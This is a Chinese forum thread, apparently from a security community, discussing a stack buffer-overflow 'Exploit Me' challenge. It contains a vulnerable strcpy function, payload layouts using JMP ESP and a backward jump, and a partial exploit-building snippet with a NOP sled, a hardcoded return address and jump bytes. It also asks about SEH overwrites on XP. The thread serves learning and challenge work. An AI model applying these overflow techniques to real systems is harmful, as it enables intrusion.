|
|
|
[原创]看雪的Exploit Me挑战赛第一题黑盒测试过程
您好,看了您的方法,我也尝试了一下,我遇到一个很奇怪的问题 向前跳,能够跳到一片nop中,但往往总是出问题. 比如 void overflow(char * s,int size) { char s1[320]; printf("receive %d bytes \n",size); s[size]=0; strcpy(s1,s); } --------------------------------------- [...buffer....][JMP ESP][shellcode] 这样的好构造. [...buffer..shellcode...buffer][EBP][JMP ESP][JumpBack] 这个有些问题: 1 计算往前跳多少? 2 jmp -0x??h ;是否吧0x??转换成2进制,取反后再加1? 3 能否做一份覆盖seh for xp? 上传一份我学习试验用的程序 buf[320]个字节,足够放shellcode了,请帮忙尝试一下shellcode往前跳 RtlZeroMemory(sploit,sizeof(sploit) -1); memset(sploit,0x90,sizeof(sploit)-1); memcpy(sploit+100,shellcode,sizeof(shellcode)-1); memcpy(sploit+320+4,"\x12\x45\xfa\x7f",4); memcpy(sploit+320+4+4,"\xeb\x18\xeb\x18",4);//尝试过20,d4,..都跳不过去 printf("%s\n",sploit); 郁闷啊 |
|
关于EXPLOIT_A的例子,谁能给一份覆盖SEH,和JMP -X的例子?
例如: jmp -1000 jmp 1000 jmp 0x1000 这样的机器码怎么取得? 在od 加载一个exe,然后直接修改反汇编功能? |
操作理由
RANk
{{ user_info.golds == '' ? 0 : user_info.golds }}
雪币
{{ experience }}
课程经验
{{ score }}
学习收益
{{study_duration_fmt}}
学习时长
基本信息
荣誉称号:
{{ honorary_title }}
能力排名:
No.{{ rank_num }}
等 级:
LV{{ rank_lv-100 }}
活跃值:
在线值:
浏览人数:{{ visits }}
最近活跃:{{ last_active_time }}
注册时间:{{ user_info.create_date_jsonfmt }}
勋章
兑换勋章
证书
证书查询 >
能力值